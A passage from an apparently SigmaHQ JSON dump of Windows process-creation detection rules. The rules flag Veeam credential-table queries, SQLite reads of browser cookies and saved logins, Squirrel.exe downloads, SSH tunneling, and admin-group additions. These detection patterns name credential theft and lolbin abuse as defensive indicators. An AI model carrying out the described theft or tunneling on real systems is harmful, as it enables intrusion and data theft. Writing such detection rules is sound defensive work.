    "content": "title: Veeam Backup Database Suspicious Query\nid: 696bfb54-227e-4602-ac5b-30d9d2053312\nstatus: test\ndescription: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        Image|endswith: '\\sqlcmd.exe'\n        CommandLine|contains|all:\n            - 'VeeamBackup'\n            - 'From '\n    selection_db:\n        CommandLine|contains:\n            - 'BackupRepositories'\n            - 'Backups'\n            - 'Credentials'\n            - 'HostCreds'\n            - 'SmbFileShares'\n            - 'Ssh_creds'\n            - 'VSphereInfo'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml",
    "content": "title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE\nid: b57ba453-b384-4ab9-9f40-1038086b4e53\nstatus: test\ndescription: Detects dump of credentials in VeeamBackup dbo\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html\nauthor: frack113\ndate: 2021-12-20\nmodified: 2023-02-13\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        Image|endswith: '\\sqlcmd.exe'\n    selection_query:\n        CommandLine|contains|all:\n            - 'SELECT'\n            - 'TOP'\n            - '[VeeamBackup].[dbo].[Credentials]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml",
    "content": "title: SQLite Chromium Profile Data DB Access\nid: 24c77512-782b-448a-8950-eddb0785fc71\nstatus: test\ndescription: Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows\n    - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nauthor: TropChaud\ndate: 2022-12-19\nmodified: 2023-01-19\ntags:\n    - attack.credential-access\n    - attack.t1539\n    - attack.t1555.003\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        - Product: SQLite\n        - Image|endswith:\n              - '\\sqlite.exe'\n              - '\\sqlite3.exe'\n    selection_chromium:\n        CommandLine|contains:\n            - '\\User Data\\' # Most common folder for user profile data among Chromium browsers\n            - '\\Opera Software\\' # Opera\n            - '\\ChromiumViewer\\' # Sleipnir (Fenrir)\n    selection_data:\n        CommandLine|contains:\n            - 'Login Data' # Passwords\n            - 'Cookies'\n            - 'Web Data' # Credit cards, autofill data\n            - 'History'\n            - 'Bookmarks'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml",
    "content": "title: SQLite Firefox Profile Data DB Access\nid: 4833155a-4053-4c9c-a997-777fcea0baa7\nstatus: test\ndescription: Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows\n    - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nauthor: frack113\ndate: 2022-04-08\nmodified: 2023-01-19\ntags:\n    - attack.credential-access\n    - attack.t1539\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        - Product: SQLite\n        - Image|endswith:\n              - '\\sqlite.exe'\n              - '\\sqlite3.exe'\n    selection_firefox:\n        CommandLine|contains:\n            - 'cookies.sqlite'\n            - 'places.sqlite' # Bookmarks, history\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_squirrel_download.yml",
    "content": "title: Arbitrary File Download Via Squirrel.EXE\nid: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c\nrelated:\n    - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e\n      type: similar\n    - id: fa4b21c9-0057-4493-b289-2556416ae4d7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of the \"Squirrel.exe\" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2022-06-09\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\squirrel.exe'\n            - '\\update.exe'\n    selection_download_cli:\n        CommandLine|contains:\n            - ' --download '\n            - ' --update '\n            - ' --updateRollback='\n    selection_download_http_keyword:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml",
    "content": "title: Process Proxy Execution Via Squirrel.EXE\nid: 45239e6a-b035-4aaf-b339-8ad379fcb67e\nrelated:\n    - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c\n      type: similar\n    - id: fa4b21c9-0057-4493-b289-2556416ae4d7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2022-06-09\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\squirrel.exe'\n            - '\\update.exe'\n    selection_exec:\n        CommandLine|contains:\n            - '--processStart'\n            - '--processStartAndWait'\n            - '--createShortcut'\n    filter_optional_discord:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Discord\\Update.exe'\n            - 'Discord.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStart'\n    filter_optional_github_desktop:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n            - 'GitHubDesktop.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStartAndWait'\n    filter_optional_teams:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - 'Teams.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    filter_optional_yammer:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\yammerdesktop\\Update.exe'\n            - 'Yammer.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml",
    "content": "title: Port Forwarding Activity Via SSH.EXE\nid: 327f48c1-a6db-4eb8-875a-f6981f1b0183\nstatus: test\ndescription: Detects port forwarding activity via SSH.exe\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-12\nmodified: 2024-03-05\ntags:\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1572\n    - attack.t1021.001\n    - attack.t1021.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ssh.exe'\n        CommandLine|contains|windash: ' -R '\n    condition: selection\nfalsepositives:\n    - Administrative activity using a remote port forwarding to a local port\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml",
    "content": "title: Program Executed Using Proxy/Local Command Via SSH.EXE\nid: 7d6d30b8-5b91-4b90-a891-46cccaf29598\nstatus: test\ndescription: Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ssh/\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/211/files\n    - https://gtfobins.github.io/gtfobins/ssh/\n    - https://man.openbsd.org/ssh_config#ProxyCommand\n    - https://man.openbsd.org/ssh_config#LocalCommand\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-12-29\nmodified: 2025-10-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        # ParentCommandLine: '\"C:\\Windows\\System32\\OpenSSH\\sshd.exe\" -R'\n        ParentImage: 'C:\\Windows\\System32\\OpenSSH\\sshd.exe'\n    selection_cli_img:\n        - Image|endswith: '\\ssh.exe'\n        - Product: 'OpenSSH for Windows'\n        - Hashes|contains:\n              - 'IMPHASH=55b4964d29aad5438b9e950052dbbbc0'\n              - 'IMPHASH=334d66c33503ccbf647c15b47c27eef4'\n              - 'IMPHASH=27b0da080ef92afb37983d30d839141e'\n              - 'IMPHASH=977eb4c263d384e47daa0712d34713ab'\n              - 'IMPHASH=3eaadce9ae43d5a918bb082065815c3b'\n              - 'IMPHASH=980fe6cf0d996ab1eedf877222e722aa'\n              - 'IMPHASH=5f959422308ac3d721010d66647e100e'\n              - 'IMPHASH=a49aaa3d03d1cd9c8dc7fca60f7f480b'\n              - 'IMPHASH=dd335f759b6d5d6a8382b71dd9d65791'\n    selection_cli_flags:\n        - CommandLine|contains: 'ProxyCommand='\n        - CommandLine|contains|all:\n              - 'PermitLocalCommand=yes'\n              - ' LocalCommand'\n    condition: selection_parent or all of selection_cli_*\nfalsepositives:\n    - Legitimate usage for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml",
    "content": "title: Potential RDP Tunneling Via SSH\nid: f7d7ebd5-a016-46e2-9c54-f9932f2d386d\nrelated:\n    - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe\n      type: similar\nstatus: test\ndescription: Execution of ssh.exe to perform data exfiltration and tunneling through RDP\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-12\nmodified: 2023-01-25\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ssh.exe'\n        CommandLine|contains: ':3389'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml",
    "content": "title: Potential Amazon SSM Agent Hijacking\nid: d20ee2f4-822c-4827-9e15-41500b1fff10\nstatus: test\ndescription: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.\nreferences:\n    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\n    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\n    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nauthor: Muhammad Faisal\ndate: 2023-08-02\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\amazon-ssm-agent.exe'\n        CommandLine|contains|all:\n            - '-register '\n            - '-code '\n            - '-id '\n            - '-region '\n    condition: selection\nfalsepositives:\n    - Legitimate activity of system administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml",
    "content": "title: Execution via stordiag.exe\nid: 961e0abb-1b1e-4c84-a453-aafe56ad0d34\nstatus: test\ndescription: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html\n    - https://twitter.com/eral4m/status/1451112385041911809\nauthor: Austin Songer (@austinsonger)\ndate: 2021-10-21\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\stordiag.exe'\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\systeminfo.exe'\n            - '\\fltmc.exe'\n    filter:\n        ParentImage|startswith: # as first is \"Copy c:\\windows\\system32\\stordiag.exe to a folder\"\n            - 'c:\\windows\\system32\\'\n            - 'c:\\windows\\syswow64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate usage of stordiag.exe.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml",
    "content": "title: Start of NT Virtual DOS Machine\nid: 16905e21-66ee-42fe-b256-1318ada2d770\nstatus: test\ndescription: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications\nreferences:\n    - https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\n    - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7\n    - https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/\n    - https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/\nauthor: frack113\ndate: 2022-07-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\ntvdm.exe'\n            - '\\csrstub.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml",
    "content": "title: Abused Debug Privilege by Arbitrary Parent Processes\nid: d522eca2-2973-4391-a3e0-ef0374321dae\nstatus: test\ndescription: Detection of unusual child processes by different system processes\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg\nauthor: 'Semanur Guneysu @semanurtg, oscd.community'\ndate: 2020-10-28\nmodified: 2022-11-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\winlogon.exe'\n            - '\\services.exe'\n            - '\\lsass.exe'\n            - '\\csrss.exe'\n            - '\\smss.exe'\n            - '\\wininit.exe'\n            - '\\spoolsv.exe'\n            - '\\searchindexer.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    filter:\n        CommandLine|contains|all:\n            - ' route '\n            - ' ADD '\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml",
    "content": "title: User Added to Local Administrators Group\nid: ad720b90-25ad-43ff-9b5e-5c841facc8e5\nrelated:\n    - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups\n      type: similar\n    - id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-03-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              # net.exe\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              # powershell.exe\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - ' administrators '\n            - ' administrateur' # Typo without an 'S' so we catch both\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml",
    "content": "title: User Added To Highly Privileged Group\nid: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\nrelated:\n    - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups\n      type: similar\n    - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              # net.exe\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              # powershell.exe\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - 'Group Policy Creator Owners'\n            - 'Schema Admins'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity that must be investigated\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml",
    "content": "title: User Added to Remote Desktop Users Group\nid: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e\nrelated:\n    - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups\n      type: similar\n    - id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-06\nmodified: 2022-09-09\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1133\n    - attack.t1136.001\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml",
    "content": "title: Execute From Alternate Data Streams\nid: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c\nstatus: test\ndescription: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: frack113\ndate: 2021-09-01\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_stream:\n        CommandLine|contains: 'txt:'\n    selection_tools_type:\n        CommandLine|contains|all:\n            - 'type '\n            - ' > '\n    selection_tools_makecab:\n        CommandLine|contains|all:\n            - 'makecab '\n            - '.cab'\n    selection_tools_reg:\n        CommandLine|contains|all:\n            - 'reg '\n            - ' export '\n    selection_tools_regedit:\n        CommandLine|contains|all:\n            - 'regedit '\n            - ' /E '\n    selection_tools_esentutl:\n        CommandLine|contains|all:\n            - 'esentutl '\n            - ' /y '\n            - ' /d '\n            - ' /o '\n    condition: selection_stream and (1 of selection_tools_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml",
    "content": "title: Always Install Elevated Windows Installer\nid: cd951fdc-4b2f-47f5-ba99-a33bf61e3770\nstatus: test\ndescription: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020-10-13\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_image_1:\n        Image|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        Image|endswith: 'tmp'\n    selection_image_2:\n        Image|endswith: '\\msiexec.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_installer:\n        ParentImage: 'C:\\Windows\\System32\\services.exe'\n    filter_repair:\n        - CommandLine|endswith: '\\system32\\msiexec.exe /V' # ignore \"repair option\"\n        - ParentCommandLine|endswith: '\\system32\\msiexec.exe /V' # ignore \"repair option\"\n    filter_sophos:\n        ParentImage|startswith: 'C:\\ProgramData\\Sophos\\'\n    filter_avira:\n        ParentImage|startswith: 'C:\\ProgramData\\Avira\\'\n    filter_avast:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Avast Software\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\'\n    filter_google_update:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Google\\Update\\'\n            - 'C:\\Program Files (x86)\\Google\\Update\\'\n    condition: 1 of selection_image_* and selection_user and not 1 of filter_*\nfalsepositives:\n    - System administrator usage\n    - Anti virus products\n    - WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml",
    "content": "title: Potentially Suspicious Windows App Activity\nid: f91ed517-a6ba-471d-9910-b3b4a398c0f3\nstatus: test\ndescription: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution\nreferences:\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-12\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        # GrandParentImage|endswith: '\\sihost.exe'\n        ParentImage|contains: 'C:\\Program Files\\WindowsApps\\'\n    selection_susp_img:\n        Image|endswith:\n            # You can add more LOLBINs\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    selection_susp_cli:\n        # You can add more potentially suspicious keywords\n        CommandLine|contains:\n            - 'cmd /c'\n            - 'Invoke-'\n            - 'Base64'\n    filter_optional_terminal:\n        ParentImage|contains: ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal'\n        ParentImage|endswith: '\\WindowsTerminal.exe'\n        # Note: to avoid FP add the default shells and profiles that your WT integrates\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\cmd.exe'\n            - '\\pwsh.exe'\n    filter_optional_sysinternals:\n        ParentImage|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite'\n        Image|endswith: '\\cmd.exe'\n    condition: selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate packages that make use of external binaries such as Windows Terminal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml",
    "content": "title: Arbitrary Shell Command Execution Via Settingcontent-Ms\nid: 24de4f3b-804c-4165-b442-5a06a2302c7e\nstatus: test\ndescription: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.\nreferences:\n    - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39\nauthor: Sreeman\ndate: 2020-03-13\nmodified: 2022-04-14\ntags:\n    - attack.t1204\n    - attack.t1566.001\n    - attack.execution\n    - attack.initial-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '.SettingContent-ms'\n    filter:\n        CommandLine|contains: 'immersivecontrolpanel'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml",
    "content": "title: Phishing Pattern ISO in Archive\nid: fcdf69e5-a3d3-452a-9724-26f2308bf2b1\nstatus: test\ndescription: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)\nreferences:\n    - https://twitter.com/1ZRR4H/status/1534259727059787783\n    - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-07\ntags:\n    - attack.initial-access\n    - attack.t1566\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\Winrar.exe'\n            - '\\7zFM.exe'\n            - '\\peazip.exe'\n        Image|endswith:\n            - '\\isoburn.exe'\n            - '\\PowerISO.exe'\n            - '\\ImgBurn.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml",
    "content": "title: Automated Collection Command Prompt\nid: f576a613-2392-4067-9d1a-9345fb58d8d1\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021-07-28\nmodified: 2022-11-11\ntags:\n    - attack.collection\n    - attack.t1119\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ext:\n        CommandLine|contains:\n            - '.doc'\n            - '.docx'\n            - '.xls'\n            - '.xlsx'\n            - '.ppt'\n            - '.pptx'\n            - '.rtf'\n            - '.pdf'\n            - '.txt'\n    selection_other_dir:\n        CommandLine|contains|all:\n            - 'dir '\n            - ' /b '\n            - ' /s '\n    selection_other_findstr:\n        OriginalFileName: 'FINDSTR.EXE'\n        CommandLine|contains:\n            - ' /e '\n            - ' /si '\n    condition: selection_ext and 1 of selection_other_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml",
